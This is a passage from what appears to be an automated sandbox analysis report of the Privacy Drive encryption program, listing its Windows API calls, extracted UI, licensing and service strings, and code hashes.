                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseHandle$File$ErrorLast$CreateCriticalMessageSectionSize$ControlDeviceEnterFormatFreeLeaveLocalPeekRead
                                • String ID: 0007$0029$0036$0046$0049$0050
                                • API String ID: 2213350598-2618284430
                                • Opcode ID: 3cedeb5193330f896e723b8cf1009cf94272856b10c52bc489cced8b4fc20aa4
                                • Instruction ID: 318539d08eab5a61179405a0b6b8b6fd3223384e63cadc680ddb675490b3d449
                                • Opcode Fuzzy Hash: 3cedeb5193330f896e723b8cf1009cf94272856b10c52bc489cced8b4fc20aa4
                                • Instruction Fuzzy Hash: 63F1C0352147019BEB20AB20CC89FAB37A5EF45705F04052EF955AB3D1DBB8E844CF6A
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,7563D392), ref: 00476A5E
                                • GetLastError.KERNEL32 ref: 00476A64
                                • MessageBoxW.USER32(00000000,Failed to get process path!,Error,00000000), ref: 00476A7C
                                • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?), ref: 00476B4B
                                  • Part of subcall function 004753C0: VirtualProtect.KERNEL32(HjG,?,00000020,00000000,7563D392), ref: 0047540A
                                  • Part of subcall function 004753C0: VirtualProtect.KERNEL32(HjG,?,00000000,00000000,00000002,HjG,?,00000000), ref: 00475435
                                Strings
                                Similarity
                                • API ID: ProtectVirtual$ErrorFileFolderLastMessageModuleNamePath
                                • String ID: %sPortable.xml$Config.xml$Cybertron\Privacy Drive$Error$Failed to get APP_DATA path!$Failed to get Windows path!$Failed to get process path!$HjG$Install$StartService$Uninstall$UserData.dat$\Config.xml$\UserData.dat
                                • API String ID: 2340151771-1550425483
                                • Opcode ID: b49f2d5449e4e3ce363acc4e86bb07c92bc81ca31b1b74e6bf19ad076ae4fd31
                                • Instruction ID: 473965d133ee9a4a4aa847d1be9f38191646d17d8f9cd5fe6bb26ab60e22d3ae
                                • Opcode Fuzzy Hash: b49f2d5449e4e3ce363acc4e86bb07c92bc81ca31b1b74e6bf19ad076ae4fd31
                                • Instruction Fuzzy Hash: 1EB18F70640208ABDB14EB55DC56BED7BB5BF14348F00819EF64AA72C1DF789A84CB98
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,?,00000000,0047263E,00000000,?,00000000,00000000,?,?,?,?,00000000,0053B15B,000000FF), ref: 004722C0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00000000,0053B15B,000000FF), ref: 004722D8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Menu,00000394,STANDARD,?,?,?,?,00000000,0053B15B,000000FF), ref: 00472305
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00000000,0053B15B,000000FF), ref: 00472317
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Menu,00000374,STANDARD,?,?,?,?,00000000,0053B15B,000000FF), ref: 00472344
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00000000,0053B15B,000000FF), ref: 00472356
                                  • Part of subcall function 00424910: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008), ref: 0042491C
                                  • Part of subcall function 00424910: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008,ACTIVATE_TITLE_BEGIN,00000007), ref: 0042492F
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: IMG_CHECKED$IMG_GLOSS_TEXTURE$IMG_PAGEBUTTON_DOWN$IMG_PAGEBUTTON_UP$IMG_POPUP$IMG_SHADOW_BOTTOM$IMG_SHADOW_LB$IMG_SHADOW_LEFT$IMG_SHADOW_LT$IMG_SHADOW_RB$IMG_SHADOW_RIGHT$IMG_SHADOW_RT$IMG_SHADOW_TOP$IMG_TITLE$Menu$Menu\Shadow$STANDARD$STANDARD||TYPE_1
                                • API String ID: 904232820-4271733006
                                • Opcode ID: fdc82d2778dd63787b58c29ba190d88ef52f95139b13abb2df8026b8eb4a0fd9
                                • Instruction ID: d1ca696b88e7c6926439ed5789eab024851eeebd8278ddf3fbe08148c7662b1b
                                • Opcode Fuzzy Hash: fdc82d2778dd63787b58c29ba190d88ef52f95139b13abb2df8026b8eb4a0fd9
                                • Instruction Fuzzy Hash: BC4166703C071267EA0576325D03FAA69597F90B45F08801FBA1DBA1C2EFD8E90096BD
                                APIs
                                • CreateMutexW.KERNEL32(00000000,00000001,_Privacy Drive,7563D392), ref: 0040FA41
                                • GetLastError.KERNEL32 ref: 0040FA56
                                • CloseHandle.KERNEL32 ref: 0040FA6D
                                • OpenMutexW.KERNEL32(00100000,00000000,_Privacy Drive,?,?,00000000), ref: 0040FADE
                                • CloseHandle.KERNEL32(00000000), ref: 0040FAED
                                • Sleep.KERNEL32(00000064), ref: 0040FB11
                                • GetCurrentProcessId.KERNEL32 ref: 0040FB48
                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,?,?,00000000), ref: 0040FBA2
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,00000000), ref: 0040FBBB
                                • FlushViewOfFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040FBE0
                                • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0040FBE6
                                • SendMessageW.USER32(00000000,00000111,000004DB,00000000), ref: 0040FBF8
                                • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040FC01
                                Strings
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentMutexProcessView$ErrorFlushLastMappingMessageOpenSendSleep
                                • String ID: !@$%s_Shared_%u$Privacy Drive Std Dialog Activation$Privacy Drive Std Main Frame$Rerun$_Privacy Drive
                                • API String ID: 119523191-1318878198
                                • Opcode ID: e0bf2834d42df8286364d1d6106b5b8930e964d14234c5d4bab024d32033fe58
                                • Instruction ID: a30ce1052aed84a7f83e80f23250de81ee4dd0901ec1c01045540fd42c29c870
                                • Opcode Fuzzy Hash: e0bf2834d42df8286364d1d6106b5b8930e964d14234c5d4bab024d32033fe58
                                • Instruction Fuzzy Hash: 9071C331A00308ABEB10EBA5DD16BAE77B4FB48311F140539FA01F72D1DB78A804CBA4
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A4BDC,?,?,?,00404A2A,?,00002712,00000000), ref: 004A4900
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00404A2A,?,00002712,00000000), ref: 004A4918
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,STANDARD,?,00404A2A,?,00002712,00000000), ref: 004A4945
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00404A2A,?,00002712,00000000), ref: 004A4957
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,STANDARD,?,00404A2A,?,00002712,00000000), ref: 004A4984
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00404A2A,?,00002712,00000000), ref: 004A4996
                                  • Part of subcall function 00424910: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008), ref: 0042491C
                                  • Part of subcall function 00424910: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008,ACTIVATE_TITLE_BEGIN,00000007), ref: 0042492F
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Button$Button\State$CR_DISABLED_BACKGROUND$CR_DISABLED_BORDER$CR_HIT_BACKGROUND$CR_HIT_BORDER$CR_NORMAL_BACKGROUND$CR_NORMAL_BORDER$CR_PUSH_BACKGROUND$CR_PUSH_BORDER$PM_FILLET$PM_HEIGHT$STANDARD$STANDARD|DISABLED$STANDARD|HIT$STANDARD|NORMAL$STANDARD|PUSH
                                • API String ID: 904232820-70401535
                                • Opcode ID: 9c2030392b6330b3e05bab43e78cbad26a7cb263d08b6152366fde4aca2a4a79
                                • Instruction ID: 45afea047e48c39cfd3e14ad7c1c7b5623383e324d3ba7e84717a9c0e15e9774
                                • Opcode Fuzzy Hash: 9c2030392b6330b3e05bab43e78cbad26a7cb263d08b6152366fde4aca2a4a79
                                • Instruction Fuzzy Hash: 7F51813078031162DA55B232AD87F6F19857FD5B45F44042EBA5AA72C2FEE9E802C73D
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00444440
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00444458
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CREATING_VOLUME), ref: 00444485
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00444497
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CREATING_VOLUME), ref: 004444C4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004444D6
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CHECKBOX_CLOSE_X$CHECKBOX_CLOSE_Y$COMPLETED_Y$CREATING_VOLUME$Dialog$ELAPSED_TIMES_Y$FILENAME_X$FILENAME_Y$ICON_X$ICON_Y$PATH_X$PATH_Y$PROGRESS_BAR_X$PROGRESS_BAR_Y$REMAINING_TIMES_Y$SPEED_Y
                                • API String ID: 904232820-2618109599
                                • Opcode ID: 1563389ca7e6bff05b978fe7bd61b38159bc0f150c51b316783dfa8b6d7ca170
                                • Instruction ID: 894f6084bdbb1a62b58e92d0cb2c024dc5b6c8091a70dcc14a00fb35b55d1dfc
                                • Opcode Fuzzy Hash: 1563389ca7e6bff05b978fe7bd61b38159bc0f150c51b316783dfa8b6d7ca170
                                • Instruction Fuzzy Hash: 51419730380B027AFA4463329D23F7B1A5ABB51F45F41402BBA05E62C1EFDCE911969D
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00432620
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00432638
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTRATION_REMINDER_MINI), ref: 00432665
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00432677
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTRATION_REMINDER_MINI), ref: 004326A4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004326B6
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CR_BACKGROUND_BEGIN$CR_BACKGROUND_END$CR_BORDER_BACKGROUND$CR_BOTTOM_BACKGROUND_BEGIN$CR_BOTTOM_BACKGROUND_END$CR_GENERAL$CR_TITLE$CR_WARNING$Dialog$IMG_ARROW$IMG_ICON$PM_ARROW_X$PM_BORDER$PM_FILLET$PM_FILLET2$REGISTRATION_REMINDER_MINI
                                • API String ID: 904232820-3547206135
                                • Opcode ID: b58ab82fcadba15aae9994f977523bea4edf7cb2760220261414fbd3c49184fa
                                • Instruction ID: 0a878cd1433689f4d0d3299847657b5edb1d1d45717a6218fa825460d51ef61a
                                • Opcode Fuzzy Hash: b58ab82fcadba15aae9994f977523bea4edf7cb2760220261414fbd3c49184fa
                                • Instruction Fuzzy Hash: 1A416530380B0276DA18B6729D12FA77A557B04F4AF44523BB618E61C2FFD8F815CE59
                                APIs
                                  • Part of subcall function 0045DCD0: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0045DD0E
                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00020019,?,7563D392,005BE234,75A8EB20,005783F0), ref: 0045C89E
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000019), ref: 0045C8C1
                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,00000000,-00000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\,0000003A), ref: 0045C974
                                • RegQueryValueExW.ADVAPI32(?,ServiceName,00000000,00000001,?,0045C671), ref: 0045C9AF
                                • RegCloseKey.ADVAPI32(?), ref: 0045CA1D
                                • RegEnumKeyW.ADVAPI32(?,00000001,00000000,00000019), ref: 0045CA64
                                • RegCloseKey.ADVAPI32(?), ref: 0045CA74
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,75A8EB34,00000000,000000FF,\\.\,00000004), ref: 0045CB1B
                                • DeviceIoControl.KERNEL32(00000000,00170002,01010102,00000004,0045C671,00000006,?,00000000), ref: 0045CB58
                                • CloseHandle.KERNEL32(00000000), ref: 0045CB5F
                                Strings
                                Similarity
                                • API ID: Close$EnumOpen$Concurrency::details::_Concurrent_queue_base_v4::_ControlCreateDeviceFileHandleInternal_throw_exceptionQueryValue
                                • String ID: 4[P[$4[P[$HardwareID.cpp$SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\$ServiceName$\\.\$d
                                • API String ID: 3970217950-1793246607
                                • Opcode ID: 3fd7bc30e3ad3b9f7a86cf77d6027eeaf0c2f872544d776e4dc095a49a7457a0
                                • Instruction ID: dbc346add66269ab6cd4fd60308b7b0865e9ffdfadef4d1509db4847bad84fb0
                                • Opcode Fuzzy Hash: 3fd7bc30e3ad3b9f7a86cf77d6027eeaf0c2f872544d776e4dc095a49a7457a0
                                • Instruction Fuzzy Hash: 82C139719002299FDB61DF54CC89BDEBBB4BF08709F00409AE909A7291EB746A88CF55
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00447150
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00447168
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_PASSWORD), ref: 00447195
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004471A7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_PASSWORD), ref: 004471D4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004471E6
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CHANGE_PASSWORD$Dialog$PM_EDIT_HEIGHT$PM_EDIT_LEFT$PM_EDIT_NEW_PASSWORD_1_X$PM_EDIT_NEW_PASSWORD_1_Y$PM_EDIT_NEW_PASSWORD_2_X$PM_EDIT_NEW_PASSWORD_2_Y$PM_EDIT_PASSWORD_X$PM_EDIT_PASSWORD_Y$PM_EDIT_TOP$PM_EDIT_WIDTH$PM_EIDT_INTERVAL$PM_ICON_X$PM_ICON_Y
                                • API String ID: 904232820-2465005945
                                • Opcode ID: 3430bf9ee36cb6a63971e56141cead649e770664fe3d6e06a106b8383a58ca55
                                • Instruction ID: d6ba44327f6387490c6c5f3919e2e623994676edf6e9c8a4ed366ae526e773d0
                                • Opcode Fuzzy Hash: 3430bf9ee36cb6a63971e56141cead649e770664fe3d6e06a106b8383a58ca55
                                • Instruction Fuzzy Hash: EE41657038470266EA60BB328D16BBA19956B54F45F04002BBE46F62C1FFD8E901D2AD
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00404450
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00404468
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_KEY_FILE), ref: 00404495
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004044A7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_KEY_FILE), ref: 004044D4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004044E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CHANGE_KEY_FILE$Dialog$PM_EDIT_HEIGHT$PM_EDIT_LEFT$PM_EDIT_NEW_PASSWORD_1_X$PM_EDIT_NEW_PASSWORD_1_Y$PM_EDIT_NEW_PASSWORD_2_X$PM_EDIT_NEW_PASSWORD_2_Y$PM_EDIT_PASSWORD_X$PM_EDIT_PASSWORD_Y$PM_EDIT_TOP$PM_EDIT_WIDTH$PM_EIDT_INTERVAL$PM_ICON_X$PM_ICON_Y
                                • API String ID: 904232820-2296903074
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 004516E8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,SETTINGS), ref: 0045170F
                                • LeaveCriticalSection.KERNEL32(005BDCCC,0000000B,BUTTON_APPLY,0000000A,BUTTON_CANCEL,00000009,BUTTON_OK,00000008,BUTTON_RESTORE,00000007,TABBUTTON_USER_INTERFACE,00000006,TABBUTTON_FILE_ASSOCIATION,00000005,TABBUTTON_HOTKEYS,00000004), ref: 00451814
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: BUTTON_APPLY$BUTTON_CANCEL$BUTTON_OK$BUTTON_RESTORE$Dialog$PZ$SETTINGS$TABBUTTON_DISMOUNT$TABBUTTON_ENCRYPTION$TABBUTTON_FILE_ASSOCIATION$TABBUTTON_GENERAL$TABBUTTON_HOTKEYS$TABBUTTON_MOUNT$TABBUTTON_PRIVACY$TABBUTTON_USER_INTERFACE
                                • API String ID: 2978645861-2085767557
                                APIs
                                • swprintf.LIBCMT ref: 00432B5F
                                • swprintf.LIBCMT ref: 00432C50
                                • GetLocalTime.KERNEL32(?,String,OFFICIAL_DAY,?,String,OFFICIAL_INFO,?,00000000,-00000002,Dialog,REGISTRATION_REMINDER_MINI,7563D392), ref: 00432D62
                                • swprintf.LIBCMT ref: 00432DAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: swprintf$LocalTime
                                • String ID: 4[$BUY_NOW$Dialog$LICENSE_KEY$LinkButton$OFFICIAL_DAY$OFFICIAL_INFO$REGISTRATION_REMINDER_MINI$RENEW$String$TRIAL_DAY$TRIAL_INFO$TRIAL_VERSION
                                • API String ID: 2228335886-1334633211
                                APIs
                                  • Part of subcall function 004C1DB0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000000,00000000,00000000,?,?), ref: 004C1E7F
                                • GetSystemMetrics.USER32(00000000), ref: 004883A5
                                • GetSystemMetrics.USER32(00000000), ref: 004883B1
                                • GetSystemMetrics.USER32(00000000), ref: 004883C4
                                • GetSystemMetrics.USER32(00000000), ref: 004883D0
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • GetSystemMetrics.USER32(00000001), ref: 004883F1
                                • GetSystemMetrics.USER32(00000001), ref: 004883FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MetricsSystem$ByteCharMultiWide
                                • String ID: HEIGHT$MAIN_FRAME$PROGRAM_NAME$Param$Privacy Drive$String$Version.xml$WIDTH$WINDOW_ZOOMED$Window$value
                                • API String ID: 3646970139-3605866157
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC,?,004A2335,00403019), ref: 004A27F8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,MESSAGE_BOX), ref: 004A281F
                                • LeaveCriticalSection.KERNEL32(005BDCCC,0000000A,BUTTON_YES_TO_ALL,00000009,BUTTON_IGNORE,00000008,BUTTON_RETRY,00000007,BUTTON_NO,00000006,BUTTON_YES,00000005,BUTTON_CANCEL,00000004,BUTTON_OK,00000003), ref: 004A290E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: BUTTON_CANCEL$BUTTON_IGNORE$BUTTON_NO$BUTTON_OK$BUTTON_RETRY$BUTTON_YES$BUTTON_YES_TO_ALL$Dialog$MESSAGE_BOX$PZ$TITLE_CONFIRM$TITLE_ERROR$TITLE_INFORMATION$TITLE_WARNING
                                • API String ID: 2978645861-3593334972
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: 8GW$8GW$Item$PrivacyDrive$SerialNumber.cpp$Version2.xml$_1K$sober128$value
                                • API String ID: 4104443479-967538178
                                APIs
                                • InitializeCriticalSection.KERNEL32(?,7563D392), ref: 0042E8D3
                                • GetWindowRect.USER32(00000000), ref: 0042E915
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 0042E972
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • __CxxThrowException@8.LIBCMT ref: 0042E9D1
                                • EnterCriticalSection.KERNEL32(?), ref: 0042EA1D
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0042EA2D
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0042EA37
                                • LeaveCriticalSection.KERNEL32(?), ref: 0042EA83
                                • EnterCriticalSection.KERNEL32(?), ref: 0042EA9F
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0042EABA
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0042EAC7
                                • LeaveCriticalSection.KERNEL32(?), ref: 0042EB3E
                                • GdipGraphicsClear.GDIPLUS(?,00000000), ref: 0042EB92
                                • GetDC.USER32(00000000), ref: 0042EC08
                                • UpdateLayeredWindow.USER32(?,00000000,?,?,?,00000000,00000000,00000000,00000002), ref: 0042EC2E
                                • ReleaseDC.USER32(00000000,00000000), ref: 0042EC37
                                • Sleep.KERNEL32(0000000A), ref: 0042EC45
                                • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0042ECC8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$PerformanceQuery$CounterEnterException@8FrequencyGdipLeaveThrowWindow$ClearDeleteExceptionGraphicsInitializeLayeredModeRaiseRectReleaseSleepSmoothingUpdate
                                • String ID:
                                • API String ID: 2352088596-0
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,7563D392,00000001,?), ref: 0041D7A7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0,000000FF), ref: 0041D7B4
                                  • Part of subcall function 004A6D40: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6D8C
                                  • Part of subcall function 004A6D40: DeviceIoControl.KERNEL32(?,07770C80,00000000,00000000,00000000,00004326,7563D392,00000000), ref: 004A6DA6
                                  • Part of subcall function 004A6D40: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6DCD
                                  • Part of subcall function 004A6D40: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6DED
                                  • Part of subcall function 004A6D40: EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6E14
                                  • Part of subcall function 004A6D40: LeaveCriticalSection.KERNEL32(005BE2CC,?), ref: 004A6E27
                                  • Part of subcall function 004A6D40: EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6E4C
                                  • Part of subcall function 004A6D40: LeaveCriticalSection.KERNEL32(005BE2CC), ref: 004A6E59
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0), ref: 0041D7BF
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0,000000FF), ref: 0041D7C6
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0), ref: 0041D7D1
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0,000000FF), ref: 0041D7D8
                                • InitializeCriticalSection.KERNEL32(?), ref: 0041D7FA
                                • CloseHandle.KERNEL32(00000000), ref: 0041D87B
                                • CloseHandle.KERNEL32(00000000), ref: 0041D8BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseCriticalHandleSection$ManagerMessageOpenPeekService$EnterLeave$ControlDeviceInitialize
                                • String ID: 0020$<,X$PDService$PDSvc$PrivacyDrive$pdvstd
                                • API String ID: 1155767753-786742159
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 00444658
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,CREATING_VOLUME), ref: 0044467F
                                • LeaveCriticalSection.KERNEL32(005BDCCC,00000008,CHECKBOX_AUTO_CLOSE,00000007,BUTTON_OK,00000006,BUTTON_STOP,00000005,STRING_SEC,00000004,LABEL_REMAINING_TIME,00000003,LABEL_ELAPSED_TIME,00000002,LABEL_COMPLETED,00000001), ref: 00444742
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
